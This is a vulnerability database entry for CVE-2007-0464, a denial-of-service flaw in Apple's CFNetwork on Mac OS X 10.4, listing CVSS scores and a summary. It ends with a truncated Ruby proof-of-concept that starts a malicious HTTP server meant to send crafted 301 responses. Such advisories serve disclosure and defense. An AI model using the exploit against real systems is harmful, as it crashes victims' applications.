5
CVSSv2

CVE-2007-0464

Published: 30/01/2007 Updated: 11/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 up to and including 10.4.10 allows remote malicious users to cause a denial of service (application crash) via a crafted HTTP 301 response, which results in a NULL pointer dereference.

Vulnerable Product Search on Vulmon Subscribe to Product

cfnetwork cfnetwork 129.19

Exploits

#!/usr/bin/ruby # (c) Copyright 2007 Lance M Havok <lmh [at] info-pullcom> # Proof of concept for MOAB-25-01-2007 # require 'socket' web_port = (ARGV[0] || 80)to_i puts "++ Starting HTTP server at port #{web_port}" web_server = TCPServernew(nil, web_port) while (session = web_serveraccept) rand_clen = rand(80) useragent = sessi ...